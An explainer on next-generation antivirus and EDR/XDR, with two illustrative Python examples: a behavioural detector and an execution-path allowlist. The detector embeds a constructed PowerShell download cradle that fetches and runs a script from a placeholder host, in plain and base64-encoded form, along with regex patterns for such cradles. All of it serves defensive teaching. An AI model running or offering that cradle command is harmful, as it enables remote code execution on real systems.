What is next-generation antivirus (NGAV)
Next-generation antivirus (NGAV) software helps companies prevent, detect and respond to a broad range of cyberattack tactics, techniques and procedures (TTPs). There is no single agreed definition of NGAV, but it is generally accepted that NGAV technologies supplement traditional antivirus software, which identifies attacks by matching files against a database of signatures or definitions of known threats, with at least one "advanced feature," such as machine-learning classification or behavioural analysis, that can stop threats for which no signature exists yet.
The term "next-gen antivirus" is sometimes used interchangeably with "endpoint protection platform" (EPP), though the latter usually refers to platforms with a broader feature set, including host-based firewalls, device control, sandboxing, endpoint management and application control.
Why Companies Need NGAV Capabilities
Modern, adaptive endpoint protection is crucial because today's attackers increasingly breach networks using techniques that bypass traditional antivirus software. The biggest security gaps exist at endpoints, such as desktop computers, laptops and mobile devices, where most companies have neither the time nor the resources to address every vulnerability that leaves them open to attack or breach. Ponemon Institute's 2017 State of Endpoint Security report found that, among companies that experienced an endpoint attack and were compromised, 77% said it was a fileless attack or exploit.
Traditional signature-based antivirus is ineffective against advanced threats such as script-based, multi-vector and fileless attacks, as well as advanced ransomware, because it can only match content it has seen before: script-based and fileless attacks run through legitimate interpreters or entirely in memory, so there is no malicious file on disk to scan, and ransomware families are repacked so that each sample carries a new hash. This leaves significant gaps in a company's security posture. What's more, agents that judge each file in isolation lack the broader context (parent process, command line, network activity) that an effective enterprise security architecture needs.
Without comprehensive, consistent and coordinated prevention measures, a company cannot successfully detect and respond to potential attacks in time to prevent significant damage. Consequently, relying on traditional antivirus software is not enough to protect companies from today’s security threats. Companies have to do more.
The Value and Benefits of NGAV
Advanced endpoint security solutions using machine learning and behavioural analysis offer far more robust protection than traditional antivirus, because they identify threats by what they do rather than by what they look like, including never-before-seen malware and exploits. This lets companies focus on how attackers approach and interact with their systems and stop those attacks as they unfold, instead of only dealing with security incidents after the fact.
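To make the gap described in the two passages above concrete (signature matching versus behavioural detection), here is an added example that is not part of the original page: a toy triage routine run over constructed process-creation events. A signature is modelled as the SHA-256 of a command line seen in a previous incident; the behavioural rule instead decodes any -EncodedCommand argument and scores the context (hidden window, Office parent, download cradle). The events, the `example.invalid` URL, the scoring weights and the threshold are all assumptions chosen for illustration.

```python
import base64
import hashlib
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """One process-creation record, as an NGAV/EDR sensor would log it."""
    parent: str
    image: str
    cmdline: str


def encode_ps(script: str) -> str:
    """Produce the -EncodedCommand form PowerShell accepts (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample: the same download cradle, first in clear text and then
# re-encoded. The payload is identical; only its representation changes.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
PLAIN_CMD = f'powershell.exe -nop -w hidden -c "{CRADLE}"'
ENCODED_CMD = f"powershell.exe -nop -w hidden -EncodedCommand {encode_ps(CRADLE)}"

EVENTS = [
    ProcessEvent("winword.exe", "powershell.exe", PLAIN_CMD),     # known bad
    ProcessEvent("winword.exe", "powershell.exe", ENCODED_CMD),   # same attack, re-encoded
    ProcessEvent("explorer.exe", "powershell.exe", 'powershell.exe -c "Get-Process"'),  # admin use
    ProcessEvent("svchost.exe", "powershell.exe",
                 r"powershell.exe -nop -w hidden -File C:\scripts\backup.ps1"),  # scheduled task
]

# --- Traditional approach: a signature is a hash of content seen in a past incident.
SIGNATURES = {hashlib.sha256(PLAIN_CMD.encode()).hexdigest()}


def signature_verdict(ev: ProcessEvent) -> bool:
    """True only when the exact command line is already on the signature list."""
    return hashlib.sha256(ev.cmdline.encode()).hexdigest() in SIGNATURES


# --- Behavioural approach: judge what the process does, not what it looks like.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
ENC_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
HIDE_FLAGS = re.compile(r"-(?:w|windowstyle)\s+hidden|-nop\b|-noprofile\b", re.IGNORECASE)
INDICATORS = re.compile(
    r"DownloadString|DownloadFile|Invoke-Expression|\bIEX\b|Net\.WebClient|FromBase64String",
    re.IGNORECASE,
)


def normalize(cmdline: str) -> str:
    """Replace an -EncodedCommand argument with its decoded script text."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return cmdline
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline  # not valid base64/UTF-16: keep the raw line rather than crash
    return cmdline[: m.start()] + decoded + cmdline[m.end():]


def behaviour_verdict(ev: ProcessEvent) -> bool:
    """Score context plus decoded content; alert only when enough indicators stack up."""
    if ev.image.lower() not in SCRIPT_HOSTS:
        return False
    text = normalize(ev.cmdline)
    score = 0
    if INDICATORS.search(text):
        score += 2  # remote download / in-memory execution
    if HIDE_FLAGS.search(ev.cmdline):
        score += 1  # hidden window, no profile: common in malicious cradles
    if ENC_FLAG.search(ev.cmdline):
        score += 1  # encoding is legitimate but rarely needed interactively
    if ev.parent.lower() in OFFICE_PARENTS:
        score += 2  # Office spawning a script host is a classic macro pattern
    return score >= 3  # threshold keeps a lone hidden-window admin script below the bar


def triage(events):
    """Return (parent, signature_hit, behaviour_hit) for each event."""
    return [(ev.parent, signature_verdict(ev), behaviour_verdict(ev)) for ev in events]


if __name__ == "__main__":
    for parent, sig, beh in triage(EVENTS):
        print(f"{parent:<12} signature={sig!s:<5} behaviour={beh}")
```

The signature fires on the first event only; re-encoding the identical payload defeats it. The behavioural rule catches both malicious events while leaving the interactive `Get-Process` call and the hidden-window scheduled task alone, which is the false-positive trade-off a threshold-based rule makes explicit.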
What Companies Need to Protect Their Sensitive Data
While NGAV is a major step up from traditional antivirus, the endpoint security market has moved on and now offers solutions that bundle NGAV with detection and response capabilities. Leading endpoint protection features are often included in solutions categorized as endpoint detection and response (EDR), or in the broader extended detection and response (XDR) category, which correlates telemetry from endpoints, network and cloud sources to improve the fidelity of detections and ease investigations. No enterprise can block 100% of attacks while keeping the business running, so the ability to detect, investigate and respond to threats is a critical second layer of defense behind endpoint prevention. To get the best endpoint security, companies should deploy capabilities beyond those generally included in NGAV, such as the ability to:
- Identify and block security-related attacks at all stages of the attack lifecycle.
- Gain holistic visibility across the entire network infrastructure (e.g., endpoints, network, clouds).
- Coordinate between detection and prevention capabilities to deliver consistent security across the entire network.
- Safeguard all endpoints, regardless of operating system, whether an endpoint is on-site or remote, online or offline, connected to the company’s network or not.
- Protect both virtual and cloud environments.
- Take a proactive approach to security by combining multiple prevention methods to automatically identify and stop attacks, the execution of malicious programs and the exploitation of legitimate applications in real time. This includes limiting where executable files can run on an endpoint (for example, denying execution from user-writable locations such as temp and download folders) and customizing those settings where a business need requires it.
- Deliver accurate security verdicts (malicious or benign) with few false positives, since every false alert costs analyst time and erodes trust in the tool.
All of this can allow companies to dramatically shorten the time it takes to discover, hunt down, investigate and respond to potential security attacks. The market-leading XDR solutions offer all these capabilities and more.
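The execution-location restriction mentioned in the capability list above is the easiest of these controls to prototype, so here is an added example that is not part of the original page or of any product it describes: a default-deny path policy evaluated over constructed process-creation events. It allows images under trusted roots, carves out sub-directories of those roots that standard users can write to, rejects traversal and relative paths, and honours a per-deployment SHA-256 exemption list. The trusted roots, carve-outs, sample paths and the placeholder hash are assumptions for illustration.

```python
from pathlib import PureWindowsPath

# Roots from which execution is allowed. Everything else is denied by default.
TRUSTED_ROOTS = [r"C:\Windows", r"C:\Program Files", r"C:\Program Files (x86)"]

# Sub-directories of trusted roots that standard users can write to on a default
# install. A path rule that trusts all of C:\Windows is bypassed by dropping a
# binary here, so they are carved out. Verify the list against your own builds
# with icacls; it is not exhaustive.
WRITABLE_CARVEOUTS = [r"C:\Windows\Tasks", r"C:\Windows\Temp", r"C:\Windows\Tracing"]

# Per-deployment exemption for a tool that legitimately lives outside trusted
# roots, keyed by SHA-256 so a renamed or replaced binary does not inherit it.
APPROVED_TOOL_SHA256 = "ab" * 32  # constructed placeholder, not a real digest
HASH_ALLOWLIST = {APPROVED_TOOL_SHA256}


def _parts(path: str):
    """Lower-cased path components, so comparisons are case-insensitive like NTFS."""
    return [p.lower() for p in PureWindowsPath(path).parts]


def _under(path: str, root: str) -> bool:
    """True when path is root or lies below root, compared component by component."""
    pp, rp = _parts(path), _parts(root)
    return pp[: len(rp)] == rp


def decide(image_path: str, sha256: str = "") -> tuple:
    """Return ('allow' | 'deny', reason) for a process-creation request."""
    if sha256 in HASH_ALLOWLIST:
        return "allow", "sha256 allowlist"
    p = PureWindowsPath(image_path)
    # PureWindowsPath does not collapse '..', so C:\Program Files\..\Users\x.exe
    # would otherwise appear to sit under a trusted root. Reject it outright.
    if not p.is_absolute() or ".." in p.parts:
        return "deny", "relative or traversal path"
    for carveout in WRITABLE_CARVEOUTS:
        if _under(image_path, carveout):
            return "deny", f"user-writable location under trusted root ({carveout})"
    for root in TRUSTED_ROOTS:
        if _under(image_path, root):
            return "allow", f"trusted root ({root})"
    return "deny", "outside trusted roots"


# Constructed process-creation events: (image path, SHA-256 reported by the sensor).
EVENTS = [
    (r"C:\Program Files\Vendor\app.exe", "d0" * 32),
    (r"C:\Windows\System32\cmd.exe", "d1" * 32),
    (r"C:\Users\alice\AppData\Local\Temp\invoice.exe", "d2" * 32),
    (r"C:\Users\alice\Downloads\setup.exe", "d3" * 32),
    (r"C:\Windows\Tasks\update.exe", "d4" * 32),
    (r"C:\Program Files\..\Users\alice\evil.exe", "d5" * 32),
    (r"C:\Users\bob\Tools\approved.exe", APPROVED_TOOL_SHA256),
]


def evaluate(events):
    """Return (path, verdict, reason) for every event."""
    return [(path, *decide(path, digest)) for path, digest in events]


if __name__ == "__main__":
    for path, verdict, reason in evaluate(EVENTS):
        print(f"{verdict:<5} {path}  [{reason}]")
```

Path-only rules are the weakest form of application control: they depend entirely on the file-system permissions of the trusted roots, and this toy does not resolve 8.3 short names or symbolic links, so it will wrongly deny `C:\PROGRA~1\...` rather than wrongly allow it. Production enforcement (AppLocker or Windows Defender Application Control, for instance) should combine path rules with publisher or hash rules, which is the "customizing settings" the list item refers to.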